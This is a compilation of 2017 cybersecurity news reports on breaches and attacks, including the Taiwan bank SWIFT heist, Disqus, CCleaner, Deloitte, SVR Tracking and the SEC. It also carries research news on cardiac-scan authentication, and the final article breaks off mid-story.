The Sri Lanka authorities have arrested two men allegedly involved in cyber heist at an unnamed Taiwan bank that occurred last week.
The Sri Lanka police have arrested two men allegedly involved in the Taiwan cyberheist, the suspects are accused to have hacked into computers at a Taiwan bank and stole millions of dollars last week.

According to an official, the duo was identified and arrested after they tried to withdraw large sums of money that had been wired to their accounts with a Sri Lankan bank branch in the capital Colombo.

The police Criminal Investigation Department (CID) is still investigating the hack along with Taiwan police, the law enforcement agencies suspect the gang was composed by other individuals.

“We are looking at some $1.3 million that had come into three accounts in Sri Lanka,” the official involved with the investigation told AFP, speaking on condition of anonymity. “We have taken two people into custody and we are looking for one more person.”

The Sri Lankan authorities did not disclose the name of the bank in Taiwan targeted victim of the cyber heist or the sum crooks has stolen. but a Sri Lankan media report said tens of millions of dollars had been stolen.

According to a Sri Lankan media, cybercriminals have stolen tens of millions of dollars had been wired out of the island.

The Financial Regulatory Commission in Tapei confirmed that the local Far Eastern International Bank’s SWIFT system had been infected with a computer virus but did not provide further details about the hack.

The Taiwanese media quoted the bank as saying that it experts discovered anomalies in its SWIFT system, the internal staff detected suspicious transactions starting Thursday to Sri Lanka, Cambodia and the United States.

The good news is that the Taiwan police have recovered most of the money with the help of counterparts in other countries.

In February 2015, Sri Lanka authorities investigated a similar cyber heist that involved the Bangladesh central bank, crooks transferred $20 million of stolen money to a Sri Lankan businesswoman.


Sri Lanka Arrests Two Men over Taiwan Bank Hacking
9.10.2017 securityweek Hacking
Sri Lankan police have arrested two men for allegedly helping international criminals who hacked into computers at a Taiwan bank and stole millions of dollars, an official said Sunday.

The pair were arrested after they tried to withdraw large sums of money that had been wired to their accounts with a Sri Lankan bank branch in the capital Colombo, the official said.

The police Criminal Investigation Department (CID) was working closely with Taiwan counterparts to track down the hackers, who are said to have breached the Taiwan bank's computers last week.

"We are looking at some $1.3 million that had come into three accounts in Sri Lanka," the official involved with the investigation told AFP, asking not to be named.

"We have taken two people into custody and we are looking for one more person."

Police in Sri Lanka did not disclose the name of the affected bank in Taiwan or the sum said to have been stolen, but a Sri Lankan media report said tens of millions of dollars had been wired out of the island.

In Taipei the Financial Regulatory Commission confirmed that the local Far Eastern International Bank's SWIFT system had been hacked through a computer virus but gave no details.

Taiwanese media quoted the bank as saying that it detected irregularities in its SWIFT system and there were suspicious transactions starting Thursday to Sri Lanka, Cambodia and the United States.

However, Taiwan police have recovered most of the money with the help of counterparts in other countries, the reports said.

Bank officials were not immediately available for comment.

Sri Lankan police investigated a similar theft in February last year when hackers broke into the computer system of the Bangladesh central bank and transferred $20 million of stolen money to a Sri Lankan businesswoman.

The money was recovered and an court investigation is pending.


Disqus data breach – 2012 incident Exposed details for 17.5 Million users
7.10.2017 secúrityaffairs Hacking

Disqus data breach – The blog comment hosting service for web sites and online communities Disqus has confirmed a data breach that occurred back in 2012.
On Friday evening, the worldwide blog comment hosting service for web sites and online communities Disqus has confirmed a data breach that occurred back in 2012.

In 2012, hackers have stolen details for at least 17.5 million Disqus user accounts.

The popular cyber security expert Troy Hunt, who runs the data breach notification service haveibeenpwned.com, come into the possession of a copy of the stolen data.

Follow
Have I been pwned? ✔@haveibeenpwned
New breach: Disqus had a data breach in 2012 which exposed 17.5M accounts. 71% were already in @haveibeenpwned https://haveibeenpwned.com/

1:09 AM - Oct 7, 2017
11 11 Replies 118 118 Retweets 63 63 likes
Twitter Ads info and privacy
Hunt reported the issue to Disqus staff on Friday afternoon.

19h
Troy Hunt ✔ @troyhunt
Important security alert from @Disqus. Not a fun situation, but full credit for that disclosure timeline: https://blog.disqus.com/security-alert-user-info-breach …

Follow
Troy Hunt ✔@troyhunt
23 hours and 42 minutes from initial private disclosure to @disqus to public notification and impacted accounts proactively protected pic.twitter.com/lctQEjHhiH

1:08 AM - Oct 7, 2017 · Gold Coast, Queensland
View image on Twitter
View image on Twitter
Twitter Ads info and privacy
Disqus has already started notifying users that were listed in the archive reported by Troy Hunt, the exposed records include email addresses, usernames, sign-up dates, and last login dates in plain text. The experts noticed that SHA-1 hashed passwords were only included for about 33% of all records.

Disqus declared that at the end of 2012, it switched the password hashing algorithm from SHA1 to bcrypt.

“Yesterday, on October 5th, we were alerted to a security breach that impacted a database from 2012. While we are still investigating the incident, we believe that it is best to share what we know now. We know that a snapshot of our user database from 2012, including information dating back to 2007, was exposed. The snapshot includes email addresses, Disqus user names, sign-up dates, and last login dates in plain text for 17.5mm users. Additionally, passwords (hashed using SHA1 with a salt; not in plain text) for about one-third of users are included.” states the breach notification puclished by Disqus.

According to Disqus, the last entry in the dump is from July 2012, this could be the exact moment when the data breach took place.
In response to the incident, the company started contacting users and resetting the passwords related to the users that had passwords included in the breach.

“As a precautionary measure, we are forcing the reset of passwords for all affected users. We are contacting all of the users whose information was included to inform them of the situation.” continues the Disqus data breach notification.

“We’ve taken action to protect the accounts that were included in the data snapshot. Right now, we don’t believe there is any threat to a user accounts. Since 2012, as part of normal security enhancements, we’ve made significant upgrades to our database and encryption in order to prevent breaches and increase password security. Specifically, at the end of 2012 we changed our password hashing algorithm from SHA1 to bcrypt.”

Disqus data breach

According to Disqus, there is no evidence of unauthorized logins or any other abuses associated with the stolen data.

The company is still investigating the incident.


Disqus Hacked: More than 17.5 Million Users' Details Stolen in 2012 Breach
7.10.2017 thehackernews Hacking

Another day, Another data breach disclosure.
This time the popular commenting system has fallen victim to a massive security breach.
Disqus, the company which provides a web-based comment plugin for websites and blogs, has admitted that it was breached 5 years ago in July 2012 and hackers stole details of more than 17.5 million users.
The stolen data includes email addresses, usernames, sign-up dates, and last login dates in plain text for all 17.5 million users.
What's more? Hackers also got their hands on passwords for about one-third of the affected users, which were salted and hashed using the weak SHA-1 algorithm.
The company said the exposed user information dates back to 2007 with the most recently exposed from July 2012.
According to Disqus, the company became aware of the breach Thursday (5th October) evening after an independent security researcher Troy Hunt, who obtained a copy of the site's information, notified the company.
Within about 24 hours, Disqus disclosed the data breach and started contacting its affected users, forcing them to reset their passwords as soon as possible.
"No plain text passwords were exposed, but it is possible for this data to be decrypted (even if unlikely). As a security precaution, we have reset the passwords for all affected users. We recommend that all users change passwords on other services if they are shared," Disqus' CTO Jason Yan said in a blog post.
However, since late 2012 Disqus has made other upgrades to improve its security and changed its password hashing algorithm to Bcrypt—a much stronger cryptographic algorithm which makes it difficult for hackers to obtain user's actual password.
"Since 2012, as part of normal security enhancements, we have made significant upgrades to our database and encryption to prevent breaches and increase password security, Yan said. "Specifically, at the end of 2012, we changed our password hashing algorithm from SHA1 to bcrypt."
In addition to resetting your password, you are also advised to change your passwords on other online services and platforms as well, if you share the same credentials.
It is most likely that hackers could use this stolen information in tandem with social engineering techniques to gain further information on victims. So, you are advised to beware of spam and phishing emails carrying malicious file attachments.
It is still unclear how hackers get hands-on Disqus data. San Francisco-based Disqus is still actively investigating this security incident.
We will update you as soon as more details surface.
This is yet another embarrassing breach disclosed recently, after Equifax’s disclosure of a breach of potentially 145.5 million US customers, U.S. Securities and Exchange Commission (SEC) disclosure of a breach that profited hackers, and recent Yahoo’s disclosure that 2013 data breach affected all of its 3 Billion users.


R6DB hacked. Rainbow Six Siege service’s database wiped and held for ransom
2.10.2017 securityaffairs Hacking

R6DB online gaming service that provides statistics for Rainbow Six Siege gamers, was hit by hackers who wiped its database and held the data for ransom.
The gaming industry is a privileged target for hackers, in the past several groups targeted the major company in the industry for profit and fun.

This time hackers targeted the R6DB service that provides statistics for Rainbow Six Siege players.

The hackers breached the service on September 30 and wiped the database, a PostgreSQL installation, asking the payment of a ransom.

The service went down over the weekend, in a statement released on Sunday, R6DB confirmed the attack and said that an automated bot accessed their server, wiped the archive, and left a ransom note.

In response to the incident, R6DB wipes the targeted server and completely reinstalled it. The company is currently working to restore as much of the wiped information as possible, unfortunately, some data should be definitively lost.

Follow
R6DB @Rainbow6_DB
new server is now useable!
some secondary data (past ranks, etc) might be missing for now.
updates are still running

6:13 PM - Oct 1, 2017
Replies 1 1 Retweet 14 14 likes
Twitter Ads info and privacy
R6DB

Such kind of attack is not new, in the recent months, security experts reported waves of incursions in databases left open on the Internet.

Hackers targeted MongoDB, ElasticSearch, MySQL, Cassandra, Hadoop, and CouchDB installs.

In December 2016, one bad actor started compromising vulnerable MongoDB databases. Contents were downloaded and replaced by a ransom note demanding payment in exchange for a return of the missing data. By January, many hacking groups were involved and over 20,000 vulnerable MongoDB installations were compromised. With that many groups in competition, databases were compromised multiple times and ransom notes from one group were replaced by ransom notes from another group.

After this flurry of activity in the first few months of 2016, the number of MongoDB attacks quieted over the Summer. Attacks against MongoDB databases picked up again in September — at a much faster pace. “[it] took attackers from the first wave of MongoDB attacks nearly a month to rack up 45,000 ransomed DBs. The Cru3lty group managed [22,000] only last week.”

Back to the R6DB case, the database of the company was left open by the internal personnel after an unplanned migration, a company spokesman excluded that hackers kept any data.

“Due to the hectical and unplanned September migration, we didn’t have everything locked down yet, which led to this situation,” an R6DB spokesperson said. “They left a nice ransom message, but we have no reason to believe that they kept any data. On top of that our backups are useless, since they didn’t work on the Postgres codebase yet.”

R6DB said that no personal data on Rainbow Six Siege players was exposed because it doesn’t maintain such kind of info.

Gamers used R6DB to maintain statistics about their activities across time, this information was affected by the security breach.

“We basically lost all our historical data,” said R6DB. “Some profiles are gone. We can re-index them when searched for, but that’s a step we can’t do ourselves.”

“Progressions (aka historical data, aka charts) are [EXPLETIVE] They’ll fill up again over time, but the past is gone,” R6DB said. “[PC only] aliases are half-[REDACTED]. We still have some older data, but about a months worth of aliases is lost.”


Hackers Exploiting Microsoft Servers to Mine Monero - Makes $63,000 In 3 Months
29.9.2017 thehackernews Hacking
Mining cryptocurrencies can be a costly investment as it takes a monstrous amount of computing power, and thus hackers have started using malware that steals computing resources of computers it hijacks to make lots of dollars in digital currency.
Security researchers at security firm ESET have spotted one such malware that infected hundreds of Windows web servers with a malicious cryptocurrency miner and helped cybercriminals made more than $63,000 worth of Monero (XMR) in just three months.
According to a report published by ESET today, cybercriminals only made modifications to legitimate open source Monero mining software and exploited a known vulnerability in Microsoft IIS 6.0 to secretly install the miner on unpatched Windows servers.
Although ESET's investigation does not identify the attackers, it reports that the attackers have been infecting unpatched Windows web servers with the cryptocurrency miner since at least May 2017 to mine 'Monero,' a Bitcoin-like cryptocurrency.
The vulnerability (CVE-2017-7269) exploited by the attackers was discovered in March 2017 by Zhiniang Peng and Chen Wu and resides in the WebDAV service of Microsoft IIS version 6.0—the web server in Windows Server 2003 R2.
Therefore, hackers are only targeting unpatched machines running Windows Server 2003 to make them part of a botnet, which has already helped them made over $63,000 worth of Monero.

Since the vulnerability is on a web server, which is meant to be visible from the internet, it can be accessed and exploited by anyone. You can learn more about the vulnerability here.
The newly discovered malware mines Monero that has a total market valuation of about $1.4 billion, which is far behind Bitcoin in market capitalisation, but cybercriminals’ love for Monero is due to its focus on privacy.
Unlike Bitcoin, Monero offers untraceable transactions and is anonymous cryptocurrency in the world today.
Another reason of hackers favouring Monero is that it uses a proof-of-work algorithm called CryptoNight, which suits computer or server CPUs and GPUs, while Bitcoin mining requires specific mining hardware.
However, this is not the first time when analysts have spotted such malware mining Monero by stealing computing resources of compromised computers.
In mid-May, Proofpoint researcher Kafeine discovered cryptocurrency mining malware, called 'Adylkuzz,' which was using EternalBlue exploit—created by the NSA and dumped last month by the Shadow Brokers in April—to infect unpatched Windows systems to mine Monero.
A week before that, GuardiCore researchers discovered a new botnet malware, dubbed BondNet, that was also infecting Windows systems, with a combination of techniques, for primarily mining Monero.


Cardiac Scan Authentication — Your Heart As Your Password

27.9.2017 thehackernews Hacking

Forget fingerprint authentication, retinal scanning or advanced facial recognition that has recently been implemented by Apple in its iPhone X—researchers developed a new authentication system that doesn't require any of your interaction, as simply being near your device is more than enough.
A group of computer scientists at the University of Buffalo, New York, have developed a new cardiac-scan authentication system that uses your heart's shape and size as a unique biometric to identify and authenticate you.
Dubbed Cardiac Scan, the new authentication system makes use of low-level Doppler radar to wirelessly and continuously map out the dimensions of your beating heart, granting you access to your device so long as you're near it.
In simple words, your office device should be able to recognise that it is you sitting in front of the computer, and sign you in without any password or interaction, and automatically should log you out if you step away from your computer for a lunch break.
Since, according to researchers, your old ticker's shape and pulsations are unique, useful for identifying you, authenticating access, unlocking devices, and so on.
The researchers said your heart's shape and cardiac motions are unique and only present in a person who is alive, and therefore are harder to spoof than fingerprint or iris scanners, making Cardiac Scan a reliable way to identify you, authenticate access, or unlock devices.
"No two people with identical hearts have ever been found. And people's hearts do not change shape unless they suffer from serious heart disease," Wenyao Xu, lead author on the paper and assistant professor at University of Buffalo's department of computer science and engineering said in a Monday press release.
The Cardiac Scan system takes about 8 seconds to scan a heart for the very first time, and after that, the system continuously recognises your heart, making sure another user has not stepped into your device.
To test their radar design, the researchers conducted a study on 78 people and found that their Cardiac Scan system scored a 98.61% balanced accuracy with an equal error rate (EER) of 4.42%, proving that it is a robust and usable continuous authentication system.
When talking about potential health effects of the heart scans, the team said the strength of the signal is much less than that of Wi-Fi, and other smartphone authentication systems, which emit harmful SAR (Specific Absorption Rate) radiation, and therefore does not pose any health concern.
"We are living in a Wi-Fi surrounding environment every day, and the new system is as safe as those Wi-Fi devices," Xu said. "The reader is about 5 milliwatts, even less than 1 percent of the radiation from our smartphones."
Currently, Cardiac Scan is not practical to use because of its size, but the team of researchers hopes to shrink it to the point where the system can be installed into the corners of computer keyboards and smartphones.
However, there are some privacy and security concerns over the technology, like anyone can unlock your computer or smartphone as long as you are standing near your device. Another concern is that the device may end up not recognising a person if his/her heart is changed due to heart disease.
For more technical details, you can head on to the research paper [PDF] titled "Cardiac Scan: A Non-Contact and Continuous Heart-Based User Authentication System."


Researchers Use Heart Rhythms for Continuous Authentication
27.9.2017 securityweek  Hacking
Researchers Use Heart Rhythms for Continuous Passive Authentication

Researchers from the University at Buffalo SUNY, and the Department of Electrical and Computer Engineering at Texas Tech University have proposed a novel new continuous user authentication method using cardiac motion (a heart-based function determined by users' unique heart geometry). Their paper, 'Cardiac Scan: A Non-Contact and Continuous Heart-Based User Authentication System' (PDF), will be presented at MobiCom, Utah, October 16-20.

Unlike other methods of measuring cardiac motion, this method (called Cardiac Scan) functions without physical contact or intervention by the user. The intention is to be able to recognize a unique user based on a stored template, to know when that user is in front of the computer or other device, and know when that authorized user leaves the device. While present, the session is maintained; but as soon as the user is no longer present, the session can be closed (with precise details governed by corporate policy).

Cardiac Scan is being proposed as an alternative to and improvement on static authentication, whether that includes static biometrics (such as a fingerprint or iris scan) or is limited to passwords. The problem with static authentication -- even multi-factor static authentication -- is that it only happens at the beginning of a session. If the authenticated user walks or is taken away from the device, the authentication continues regardless of who is actually using the device.

Continuous authentication seeks to solve this problem by monitoring who is using the device for as long as it is used. For this to work, it also has to be non-intrusive; that is, passive or non-volitional (as described by the researchers). There is consequently much interest in new methods of continuous passive behavioral biometrics -- that is, determining the user based on known habits such as keystroke patterns or gaze patterns. Notably, the U.S. Army Network Enterprise Technology Command (NETCOM) is deploying Plurilock's BioTracker "continuous authentication cybersecurity software to protect the warfighter against adversarial identity compromise."

To achieve their intention, the researchers have developed a sensing system based on smart DC-coupled continuous-wave radar. The result is a low-power and safe device. "We are living in a Wi-Fi surrounding environment every day, and the new system is as safe as those Wi-Fi devices," said Wenyao Xu, PhD, the study's lead author. "The reader is about 5 milliwatts, even less than 1 percent of the radiation from our smartphones."

The plan is to miniaturize the system so that it can be installed onto the corners of a computer keyboard, with the long-term aim of enabling it to be used on smartphones and at airport screening barricades. The latter, while theoretically possible, will create privacy issues since it will require cardiac motion templates retained for all travelers.

This then raises one of the primary criticisms against biometric methods of authentication: replay attacks following theft of the biometric samples. "Biometric data stored by a service provider is just as valuable a target as a database containing usernames and passwords," points out David Emm, principal security researcher at Kaspersky Lab. "Any security breach resulting in leakage of this information is likely to have much more serious consequences than the theft of a password: after all, we can change a weak password, but we can't change a compromised fingerprint, iris scan or in this case, the dimensions of our hearts."

He adds, however, that "if the biometric data is stored on the individual device as opposed to the cloud, then this minimizes the risks." Apple's new FaceID biometric for the Apple 10 and its existing TouchID fingerprint system do just that -- but it is not clear whether this would be possible for the Cardiac Scan. Certainly, any use of the system at airport screening barricades would require external storage.

Of course, replay attacks are not limited to the use of stolen templates; the term also applies to spoofing the system, for example with photos to spoof face ID and iris scanners, and latex fingerprint copies to spoof fingerprint scanners. The researchers are not unaware of this problem, although it has to be said that copying and reusing someone's cardiac geometry presents considerable technical difficulties.

"One major risk of using biometrics is the danger that the biometric token can be intercepted and replayed by an unauthorized party," say the authors. "Compared to visual-based still biometrics (face/fingerprint/iris), the cardiac signal is more complex and dynamic to fake or replicate. However, there is still a chance to compromise cardiac signal under some extreme scenarios... In cardiac motion sensing, attackers might also hack into the database and obtain cardiac motion patterns or engineer the same cardiac motion sensing device to extract a user's cardiac signal." The potential is for some form of heart pattern skimmer similar in concept to the ATM skimming devices already in use by criminals.

Nevertheless, the fact that the researchers are aware of the problem is reassuring. "This is a great direction to go," commented Randy Potts, MD of information security for Real Time Resolutions, a national financial services company. "Finding the biological and behavioral characteristics that make us unique is going to get us to the point of secure continuous authentication. The researchers have a good handle on the concern I would have, replay attacks. The other underlying problem with all biometrics," he told SecurityWeek, "is that you cannot change them. When the database used for matching gets compromised, users are not able to change their fingerprint -- or heart motion, in this case. I hope these researchers continue and we as a security community can solve the challenges around securing biometric data."

So far, the proposal looks promising. The researchers' own tests, using 78 healthy users, achieved 98.61% balanced accuracy (BAC) and 4.42% equal error rate (EER). "Cardiac Scan can measure the unique cardiac motion of individuals with regard to the cardiac moving dynamics (speed, acceleration, etc.) and heartblood circulation functionality in individuals. The system is unobtrusive, difficult to counterfeit, and easy to use," say the researchers. Furthermore, they add, "the cardiac motion biometric is robust against time change."

Nevertheless, they know that more work is required. "Currently, our work focuses on healthy people. In the future, we plan to evaluate Cardiac Scan with people of cardiovascular diseases, such as cardiac arrhythmia or using a cardiac pacemaker."


Backup Database Reveals Scale of CCleaner Hack
27.9.2017 securityweek Hacking
A backup of a database containing information on Windows systems compromised via a maliciously modified version of the CCleaner software utility has provided investigators with a clearer view of the incident.

The backup was created on September 10, shortly after the attackers discovered that the server holding the original database ran out of space. On Sept. 12, the actors completely erased the database, which had become corrupt in the meantime.

The attack on CCleaner started in early July, before Avast acquired Piriform, the firm behind the popular Windows maintenance tool. The supply chain incident was found to be sophisticated, highly targeted, and the discovery of the database backup proves that.

It all started with unknown actors compromising Piriform’s servers and replacing the legitimate 32-bit CCleaner v5.33.6162 and CCleaner Cloud v1.07.3191 releases with modified ones containing backdoor code. The infected iterations were downloaded over 2.27 million times.

The initial findings in the investigation revealed that 700,000 infected systems had reported to the command and control (C&C) server between Sept. 12 and Sept. 16. The initial infection database was erased from the server on Sept. 12, but the attackers created a backup before that.

This backup revealed the connections to the C&C made between August 18 and Sept. 10, when the server ran out of space and the logging operation ceased. Thus, the researchers concluded that a total of 5,686,677 connections were made to the C&C and that a total of 1,646,536 unique machines (based on MAC addresses) reported to the server.

The backdoor code in the CCleaner installer also allowed attackers to deploy a stage 2 payload onto affected machines, but only 40 unique computers received it, Avast reveals. The attackers were very selective when deciding which computers to deliver the payload to, likely basing that decision on the infected PCs they could access.

The 40 machines were found to be part of the networks of well-known telecoms and tech companies worldwide, including Chunghwa Telecom, Nec, Samsung, Asus, Fujitsu, Sony, Dvrdns.org, O2, Gauselman, Singtel, Intel, and VMware.

“Clearly, the logs also indicate that the attackers were looking for additional high-profile companies to target, some of them potentially leading to additional supply-chain attacks (Carriers / ISPs, server hosting companies and domain registrars),” Avast notes.

The security researchers also discovered that the attackers had to conduct continuous server maintenance, as they connected 83 times to it. Based on the attackers’ active hours, the researchers also determined that they are most likely located in Russia or the Eastern part of Middle East / Central Asia and India. Moreover, none of the hit companies is from China, Russia, or India.

“Our security team has reached out to all companies proven to be part of the 2nd stage, and we’re committed to working with them to resolve the issue fully. Obviously, the fact that the 2nd stage payload has been delivered to a computer connected to a company network doesn’t mean that the company network has been compromised. However, proper investigation is in order and necessary to fully understand the impact and take remediation actions,” Avast says.


Deloitte Hacked — Cyber Attack Exposes Clients' Emails
25.9.2017 thehackernews Hacking

Another day, another data breach. This time one of the world's "big four" accountancy firms has fallen victim to a sophisticated cyber attack.
Global tax and auditing firm Deloitte has confirmed the company had suffered a cyber attack that resulted in the theft of confidential information, including the private emails and documents of some of its clients.
Deloitte is one of the largest private accounting firms in the U.S. which offers tax, auditing, operations consulting, cybersecurity advisory, and merger and acquisition assistance services to large banks, government agencies and large Fortune 500 multinationals, among others.
The global accountancy firm said Monday that its system had been accessed via an email platform from October last year through this past March and that "very few" of its clients had been affected, the Guardian reports.
The firm discovered the cyber attack in March, but it believes the unknown attackers may have had access to its email system since October or November 2016.
Hackers managed to gain access to the Deloitte's email server through an administrator account that wasn't secured using two-factor authentication (2FA), granting the attacker unrestricted access to Deloitte's Microsoft-hosted email mailboxes.
Besides emails, hackers also may have had potential access to "usernames, passwords, IP addresses, architectural diagrams for businesses and health information."
"In response to a cyber incident, Deloitte implemented its comprehensive security protocol and began an intensive and thorough review including mobilising a team of cybersecurity and confidentiality experts inside and outside of Deloitte," a Deloitte spokesperson told the newspaper.
"As part of the review, Deloitte has been in contact with the very few clients impacted and notified governmental authorities and regulators."
Deloitte's internal investigation into the cyber incident is still ongoing, and the firm has reportedly informed only six of its clients that their information was "impacted" by the breach.
Deloitte has become the latest of the victim of the high-profile cyber attack. Just last month, Equifax publicly disclosed a breach of its systems that exposed personal data of as many as 143 million US customers.
Moreover, last week the U.S. Securities and Exchange Commission (SEC) also disclosed that hackers managed to hack its financial document filing system and illegally profited from the stolen information


Deloitte Says 'Very Few' Clients Hit by Hack
25.9.2017 securityweek  Hacking

Deloitte said Monday that "very few" of the accounting and consultancy firm's clients were affected by a hack after a news report said systems of blue-chip clients had been breached.

Deloitte said it immediately contacted government authorities and the affected clients after discovering the hack, which stemmed from a breach in an email platform, the firm said in a statement.

"Only very few clients were impacted," the company said. "No disruption has occurred to client business, to Deloitte's ability to continue to serve, or to consumers."

"Deloitte remains deeply committed to ensuring that its cyber-security defenses are best in class, to investing heavily in protecting confidential information and to continually reviewing and enhancing cyber security," the company said.

The Guardian reported Monday that six Deloitte clients had information breached by a sophisticated attack and hackers potentially had access to usernames, passwords, IP addresses, architectural diagrams for business.

Deloitte discovered the attack in March, but the hackers may have had access to the information since October or November 2016, the newspaper reported.

The Guardian described the breach as a "deep embarrassment" for the company in part because it advises clients on cybersecurity.

The Deloitte hack comes on the heels of numerous attacks on major institutions and companies in recent years. Credit ratings service Equifax is under fire after disclosing this month a breach of its systems that exposed data from about 143 million US customers.

Last week, the US Securities and Exchange Commission disclosed that a software vulnerability allowed hackers to gain "nonpublic" information that could have enabled them to make profits with inside information.


Passwords For 540,000 Car Tracking Devices Leaked Online
24.9.2017 thehackernews Hacking
Another day, another news about a data breach, though this is something disconcerting.
Login credentials of more than half a million records belonging to vehicle tracking device company SVR Tracking have leaked online, potentially exposing the personal data and vehicle details of drivers and businesses using its service.
Just two days ago, Viacom was found exposing the keys to its kingdom on an unsecured Amazon S3 server, and this data breach is yet another example of storing sensitive data on a misconfigured cloud server.
The Kromtech Security Center was first to discover a wide-open, public-facing misconfigured Amazon Web Server (AWS) S3 cloud storage bucket containing a cache belonging to SVR that was left publicly accessible for an unknown period.
Stands for Stolen Vehicle Records, the SVR Tracking service allows its customers to track their vehicles in real time by attaching a physical tracking device to vehicles in a discreet location, so their customers can monitor and recover them in case their vehicles are stolen.
The leaked cache contained details of roughly 540,000 SVR accounts, including email addresses and passwords, as well as users' vehicle data, like VIN (vehicle identification number), IMEI numbers of GPS devices.
Since the leaked passwords were stored using SHA-1, a 20-years-old weak cryptographic hash function that was designed by the US National Security Agency (NSA), which can be cracked with ease.
The leaked database also exposed 339 logs that contained photographs and data about vehicle status and maintenance records, along with a document with information on the 427 dealerships that use SVR's tracking services.
Interestingly, the exposed database also contained information where exactly in the car the physical tracking unit was hidden.
According to Kromtech, the total number of devices exposed "could be much larger given the fact that many of the resellers or clients had large numbers of devices for tracking."
Since SVR's car tracking device monitors a vehicle everywhere for the past 120 days, anyone with access to SVR users' login credentials could both track a vehicle in real time and create a detailed log of every location the vehicle has visited using any internet connected device like a desktop, laptop, mobile phone or tablet.
Eventually, the attacker could outright steal the vehicle or even rob a home when they know a car's owner is out.
Kromtech responsible alerted the company of the misconfigured AWS S3 cloud storage bucket, which has since been secured. However, It is unclear whether the publically accessible data was possibly accessed by hackers or not


Passwords and much more for 540,000 SVR Tracking accounts leaked online
24.9.2017 securityaffairs  Hacking

Login credentials for 540K records belonging to vehicle tracking device company SVR Tracking (aka Stolen Vehicle Records Tracking) have been leaked online.
Another day, another data breach to report, login credentials of more than half a million records belonging to vehicle tracking device company SVR Tracking (aka Stolen Vehicle Records Tracking) have been leaked online.

The incident potentially exposes the personal data and vehicle details of drivers and businesses using the SVR Tracking service.

A few hours ago Verizon data was leaked online, and last week a similar incident affected the entertainment giant Viacom, in both cases data were found on an unsecured Amazon S3 server.

The unsecured AWS S3 cloud storage bucket containing SVR Tracking data was discovered by experts at Kromtech Security Center.The SVR Tracking service allows its customers to track their vehicles in real time by using a physical tracking device hidden in the vehicles.

SVR Tracking device

The S3 bucket contained details of roughly 540,000 SVR accounts, including email addresses and passwords, as well as users’ vehicle data, such as VIN (vehicle identification number) and the IMEI numbers of GPS devices.

The exposed archive also includes information where the tracking device was hidden in the car.

“The repository contained over a half of a million records with logins / passwords, emails, VIN (vehicle identification number), IMEI numbers of GPS devices and other data that is collected on their devices, customers and auto dealerships. Interestingly, exposed database also contained information where exactly in the car the tracking unit was hidden.” reads the blog post published by Kromtech.

Experts highlighted that leaked passwords were protected by the weak SHA-1 hashing algorithm that was easy to crack.

“The experts discovered a Backup Folder named “accounts” contained 540,642 ID numbers, account information that included many plate & vin numbers, emails, hashed passwords, IMEI numbers and more. ” continues the analysis.

It includes also:

116 GB of Hourly Backups
8.5 GB of Daily Backups from 2017
339 documents called “logs” that contained data from a wider date range of 2015-2017 UpdateAllVehicleImages, SynchVehicleStatus, maintenance records.
Document with information on the 427 dealerships that use their tracking information.
Since archive also included the position of the vehicles for the past 120 days.

The overall number of devices could be greater because many of the resellers or clients had large numbers of devices for tracking.

Kromtech reported the discovery to the SVR that promptly secured it. However, it is unclear whether the publicly accessible data was possibly accessed by hackers or not.

At the time, it is not clear if hackers accessed the data while they unsecured online.


CCleaner Infection Database Erased
23.9.2017 securityweek Hacking
A database that allowed hackers to monitor systems infected through a maliciously modified CCleaner installer was erased on September 12, Avast has discovered.

The MariaDB (fork of MySQL) database had been created on August 11, in preparation for the release of a backdoored CCleaner installer, but ran out of space. Coupled with the corruption of the database, the lack of space on the server resulted in the attackers erasing it entirely, the security researchers have discovered.

The attack on the popular Windows maintenance tool started in early July, before Avast purchased Piriform, the maker of CCleaner. Hackers managed to infiltrate the company’s systems and modify the 32-bit CCleaner v5.33.6162 and CCleaner Cloud v1.07.3191 releases to add backdoor code to them.

The code was designed to collect user information and send it to an attacker-controlled server, which was taken down on Sept. 15. The incident resulted in 2.27 million users downloading the infected CCleaner variants between Aug. 15 and Sept. 12, when the compromise was discovered.

The attack proved to be sophisticated and highly targeted rather than just a supply chain incident. The attackers had the ability to control which machines to be served a heavily obfuscated Stage 2 payload that packs various anti-debugging and anti-emulation capabilities.

The security researchers investigating the incident have discovered on the command and control (C&C) server a database containing information on the number of infected machines. It revealed that 700,000 machines reported to the C&C server between Sept. 12 and Sept. 16, and that the secondary payload had been delivered to at least 20 of them, affecting 8 organizations worldwide.

Avast now says that a database containing information on the machines that reported to the C&C before Sept. 12 was erased because it was stored on a low-end server that ran out of space. The attackers apparently attempted to fix the issue on Sept. 10, but decided to completely erase the database two days later, after discovering it was corrupted.

“It is unfortunate that the server was a low-end machine with limited disk capacity, because if weren’t for this (just 5 days before we took the server down), we would likely have a much clearer picture of exactly who was affected by the attack as the entire database would have been intact from the initial launch date,” Avast notes.

The security researchers also discovered that a Stage 3 payload might have been involved in the incident as well. The second-stage payload was designed to contact another C&C server, send some information on the infected machine, and retrieve and execute additional code from the server.

The Stage 2 payload uses the GeeSetup_x86.dll installer, which can fetch different malware depending on the infected system’s architecture. The embedded malware is saved into registry and elaborate tactics are used to extract the registry loader routine and run it, the researchers say.

On x64 systems, the attackers modified the C runtime (CRT) by adding a few instructions to the function __security_init_cookie, responsible for securing the code from buffer overflows. They added instructions to have the _pRawDllMain function pointer link to the special function that extracts a hidden registry payload loader.

The researchers also discovered that a kill switch was included in the second-stage payload as well, but that it was triggered only after infection. Specifically, when executed, the payload checks the presence of a file %TEMP%\spf and terminates execution if the file exists.

The payload was also designed to retrieve the C&C IP address through one of three approaches: a GitHub page, a WordPress-hosted page, or by reading DNS records for an unnamed domain. During its investigation, Avast discovered that the GitHub and WordPress pages no longer exist, and that the unnamed domain doesn’t have an IP addresses registered to it. Thus, communication with the second C&C wasn’t possible and a Stage 3 payload couldn’t be delivered.


SEC announces it was hacked, information may have been used for insider trading
23.9.2017 securityaffairs Hacking

The top U.S. markets regulator SEC announced a security breach, accessed data might have been used by crooks for insider trading.
The U.S. Securities and Exchange Commission (SEC) announced that cyber criminals had previously breached its database of corporate announcements in 2016 and likely they have used it for insider trading.

On Wednesday, the SEC Chairman Jay Clayton released a “statement on cybersecurity” that reported a 2016 security breach of its EDGAR system.

The Securities and Exchange Commission’s Edgar filing system is a platform which houses detailed financial reports on publicly traded companies, including quarterly earnings and statements on acquisitions. SEC data breach
A general exterior view of the U.S. Securities and Exchange Commission (SEC) headquarters in Washington, June 24, 2011. REUTERS/Jonathan Ernst

According to Clayton, the security breach was discovered last, it is the result of the presence of “software vulnerability.”

